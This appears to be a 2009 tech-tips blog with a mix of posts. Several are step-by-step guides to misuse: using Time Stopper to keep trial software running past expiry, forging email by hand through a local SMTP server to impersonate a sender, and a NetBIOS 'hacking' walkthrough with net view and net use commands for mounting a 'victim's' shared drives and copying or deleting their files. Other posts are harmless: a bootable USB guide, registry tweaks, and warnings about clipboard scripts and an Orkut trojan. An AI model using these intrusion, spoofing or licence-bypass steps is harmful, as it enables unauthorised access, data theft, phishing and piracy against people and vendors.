How to use Trial Version software forever without Expiration

September 12th, 2009

Now we download stuff almost daily. New products pop out so often. You can use any software forever you want. You can download trial version, right. Trial version expires after some days. You can stop that expiration. You can tell trial version of the software to not count days or do not bother about time. The software will stay and keep working like original software forever and will not expire or cease to work. You do not have to change your system clock. This little software does it all.

Time Stopper : use Trial Version software forever without ExpirationTime Stopper : use Trial Version software forever without Expiration

Time Stopper is the software which can stop the time for try out version software. When you stop the time you can use your try-out versions forever. When you stop the time of a try-out version using this Time Stopper it works via this Time Stopper. Real time and date run normally on your system. You can use any number of try-out version softwares with this software.

How it Works

  • Open Time Stopper
  • Browse and select .exe of required trial software
  • Choose the new date (Any date which occurs in between your trial software time period before expiration, suggestion: set it to two days before trial software expiration date.)
  • Choose any time
  • Click open software on your selected date

If you wish to create an icon for your modified trial software and do not want to open Time stopper every time then use last button in software to create new icon. open that trial software after that from that newly created icon always otherwise it can expire.

Size: 844 KB

Get All That You Want

July 26th, 2009

Get all that you want

Get all that you want

Email Forging

July 1st, 2009

Most of the email forging tutorials on internet will teach us how to send fake mails connecting to SMTP server of ISP or any other domain.But this is not possible since these hacks will no longer work today because SMTP of remote server will reject any attempts for unauthorised access.So we have to run our own SMTP server on our computer.SMTP server is a simple software program which can be installed on your computer in few seconds.
Download QK STMP Server:

SMTP Server

SMTP Server


http://www.qksoft.com/qk-smtp-server/

How To Send Fake Emails
This is the SMTP server i am using in my tutorial.Once you download and install the server on your comp then you are all set to send fake emails successfully.This works 100%,so trust me & continue.

PART A: CONFIGURING SMTP SERVER

Once you have installed the QK SMTP server on your comp you must perform the following configuration.

1. Click on “Settings” button on the main screen,the Settings window pops up

2. On Settings window click on “Basic Parameter” tab

3. Set binding IP to “127.0.0.1″

4. Set port to “25″

PART B: FORGING EMAIL(SENDING FAKE MAIL)

1. Click on SMTP server icon on your desktop to start your SMTP server to run(The icon is shown on the notification area of the taskbar if it is running).If it is already running then this step can be ignored

2. Goto command prompt(Start-Accessories-Command prompt)

3. Type exactly as follows

C:\>telnet 127.0.0.1 25

Here 127.0.0.1 is the default IP of every computer.25 is the port number.SO you are connecting to the SMTP server running on your own computer.

NOTE:The IP 127.0.0.1 should not be substituted by any other IP.

Heres the snapshot of what you see after step 3.Click on it to enlarge

4. After typing the telnet command in the command prompt you get entry to the server which displays the following message.The response of a OK SMTP server is given below.Message within yellow color is only explanation.

220 Welcome to QK SMTP Server 3
helo hacker (Type helo & any name followed by space)
250 Hello hacker (Server Welcomes You)
mail from:billg@microsoft.com (email address can be anything of your choice)
250 billg@microsoft.com Address Okay (Server gives a positive response)
rcpt to:admin@gmail.com (Type any valid recipient e-mail address)
250 admin@gmail.com Address Okay (Server gives a positive response)
data (type this command to start input data)
354 Please start mail input
From:Gates
To:admin@gmail.com
Date:Sat Jan 5,2008 9:45 PM
Subject:A test of fake mail
You can create as many headers followed by the “:” symbol.
NOTE:HEADERS SHOULD NOT CONTAIN A LINE GAP.IF SO IT IS CONSIDERED AS BODY OF THE MAIL. Press enter twice so that there is a line gap between the header & body data

End the body of mail by pressing [ENTER] .(dot) [ENTER]

250 Mail queued for delivery (Sever indicates that the mail is ready for sending)
quit (Type this command to quit from server)
221 Closing connection. Good bye.
Connection to host lost
(You will get the above 2 lines of message after typing “quit” command)
(Your mail is sent to the recipient)

Creating a bootable ubuntu / linux pen drive

June 30th, 2009

1.First copy the iso file of the linux version you want to install on to your hard drive.

2.Download unetbootin from http://unetbootin.sourceforge.net/

3.Then double click the unetbootin file.

4.This will open up a small window, select disk image and browse to the image on your hard drive and click ok.

5.You bootable pen drive should be ready in 5 to 10 minutes
screenshot

Net BIOS Hacking

June 18th, 2009

THIS NETBIOS HACKING GUIDE WILL TELL YOU ABOUT HACKING REMOTE COMPUTER AND GAINING ACCESS TO IT’S HARD-DISK OR PRINTER.NETBIOS HACK IS THE EASIEST WAY TO BREAK INTO A REMOTE COMPUTER.

STEP-BY-STEP NETBIOS HACKING PROCEDURE

1.Open command prompt

2. In the command prompt use the “net view” command
( OR YOU CAN ALSO USE “NB Scanner” OPTION IN “IP-TOOLS” SOFTWARE BY ENTERING RANGE OF IP ADDRESSS.BY THIS METHOD YOU CAN SCAN NUMBER OF COMPUTERS AT A TIME).

Example: C:\>net view \\219.64.55.112

The above is an example for operation using command prompt.”net view” is one of the netbios command to view the shared resources of the remote computer.Here “219.64.55.112? is an IP address of remote computer that is to be hacked through Netbios.You have to substitute a vlaid IP address in it’s place.If succeeded a list of HARD-DISK DRIVES & PRINTERS are shown.If not an error message is displayed. So repeat the procedure 2 with a different IP address.

3. After succeeding, use the “net use” command in the command prompt.The “net use” is another netbios command which makes it possible to hack remote drives or printers.

Example-1:
C:\>net use D: \\219.64.55.112\F
Example-2:
C:\>net use G: \\219.64.55.112\SharedDocs
Example-3:
C:\>net use I: \\219.64.55.112\Myprint

NOTE: In Examples 1,2 & 3, D:,G: & I: are the Network Drive Names that are to be created on your computer to access remote computer’s hard-disk.

NOTE: GIVE DRIVE NAMES THAT ARE NOT USED BY ANY OTHER DRIVES INCLUDING HARD-DISK DRIVES,FLOPPY DRIVES AND ROM-DRIVES ON YOUR COMPUTER.THAT IS IF YOU HAVE C: & D: AS HARD DIRVES, A: AS FLOPPY DIVE AND E: AS CD-DRIVE, GIVE F: AS YOUR SHARED DRIVE IN THE COMMAND PROMPT

F:,”SharedDocs” are the names of remote computer’s hard-disk’s drives that you want to hack. “Myprint” is the name of remote computer’s printer.These are displayed after giving “net use” command. “219.64.55.112? is the IP address of remote computer that you want to hack.

4. After succeeding your computer will give a message that “The command completed successfully“. Once you get the above message you are only one step away from hacking the computer.

Now open “My Computer” you will see a new “Hard-Disk drive”(Shared) with the specified name.You can open it and access remote computer’s Hard-Drive.You can copy files,music,folders etc. from victim’s hard-drive.You can delete/modify data on victim’s hard-drive only if WRITE-ACCESS is enabled on victim’s system.You can access files\folders quickly through “Command Prompt”.

NOTE: If Remote Computer’s Firewall Is Enabled Your Computer Will Not Succeed In Gaining Access To Remote Computer Through Netbios.That is Netbios Hacking Is Not Possible In This Situation.(An Error Message Is Displayed).So Repeat The Procedure 2,3 With Different IP Address.

HAPPY NETBOS HACKING!!

Be careful using “ctrl+c” and “ctrl+v” using internet

April 30th, 2009

It is extremely easy to extract the text that is stored in the clipboard to steal your sensitive information.

The copied data that is stored on the clipboard, can be easily accessible over the net by a combination of JavaScript & ASP

To avoid this do as below::


1) Go to ‘Control Panel’. One way to access it is by typing control in Run

2) Go to internet option and select security tab

3) press custom level

4) In the security settings, select disable option under
“Allow paste operation via script” and click OK

THAT’S IT!! Now your sensitive information is safe from hackers.

Desktop.ini trick to apply image to a drive icon area

April 30th, 2009


With this simple yet wonderful trick you can set your favorite images as background to the Icon area of any drive.

Step by Step process:

1. Open any of your disk drives and right click with your mouse to create a new text document.

2. Type the below code in the text document created.(Better copy and paste)

[ExtShellFolderViews]
{BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098410-A513-11D0-A3A4-00C04FD706EC}
[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
IconArea_Image-=
IconArea_Image=path of jpg,jpeg,bmp,gif file

replace “path of jpg,jpeg,bmp,gif file” in the code with the path of the file where your image is located.

For example, if your jpg image is located in g:\wallpapers with the name Vista, set the path as g:\wallpapers\Vista.jpg

3. Now save it with the File name desktop.ini and hit Refresh

Note: Make sure to change the Save as type field from Text Document(*.txt) to All Files.

That’s it! Now your favorite image is set as the background.

Try it Yourself and post in your comments.

How-To Hide Your Drives

April 30th, 2009

With this simply yet wonderful registry-tweak you will be able to hide your drives.

1) Go to start–>Run.. and type regedit
which opens the registry editor window

2) From the left side pane of it browse the following path

HKEY_CURRENT_USER -> software -> microsoft -> windows -> current version -> policies -> explorer

3) Now in the right pane create a new DWORD item and name it as “NoDrives” (without quotes and its case sensitive) and modify its value and set it to
3FFFFFF (Hexa)

4) Restart computer and its done.

NOTE:: To again display the drives simply delete the DWORD we created and restart.

( always be careful while working with registry, don’t overdo anything you aren’t sure about)

How -To make hidden files inaccessible even after changing folder options

April 30th, 2009

Using this wonderful registry hack you can make hidden files not shown even after you select the ‘Show the hidden files and folders’ option in folder options.

This sought of condition occurs to some PC’s when infected with virus as well, but what the virus code actually does is it changes the registry value and nothing else. After knowing how to do this you can also deactivate that virus code easily which is the best direct troubleshooting tip for this type of virus activity on your PC.

Follow the steps as given:
1) Goto Start -> Run…. Type regedit which give you registry editor window

2) From the left pane go to
HKEY_LOCAL_MACHINES -> SOFTWARE -> Microsoft -> windows -> CurrentVersion -> Explorer -> Advanced -> Folder -> hidden ->SHOWALL

3) From the right pane search for the entry “CheckedValue”

4) Double click on that which gives you ‘Edit DWORD value’ message box
Change the value data to 0 (select hexadecimal mode) and restart your PC

That’s it!! Now your hidden files cannot be accessed even after changing the folder options. If you want to get then back, follow the same path and change value data to 1 and restart your computer.

Note: Always be careful working with registry; don’t overdo anything you don’t know.

Hope this helps…

Orkut Users…! Beware

April 30th, 2009

According to the Websense Security Labs, dangerous ‘Malicious Trojan Virus’ is rambling in orkut social networking. They have called for an attention from all orkut users regarding this virus and provided some safety measures to prevent it from creeping into your profile.

This virus may reach your profile as a scrap or mostly as a message providing links that connect to seeking love or porn stuff or quick money making schemes or any others such sought of messages that draw your attention to click on them.

The message sometimes contains several links that appear to lead to the official Orkut Web site. Clicking on a link actually leads to a malicious executable file, which is a Trojan Downloader named “imagem.exe” .
The malicious file opens the legitimate Orkut network login page, and in the background downloads a password stealing Trojan named “msn.exe” and its get copied to various system locations, using different names: “plugin.exe”,”kss.exe.” These copies are bound to the system’s start up.

So Beware and think twice before clicking on any links or scripts coming to you which you feel are not concerned to you or when you don’t know the identity of the sender.

Hope this Helps…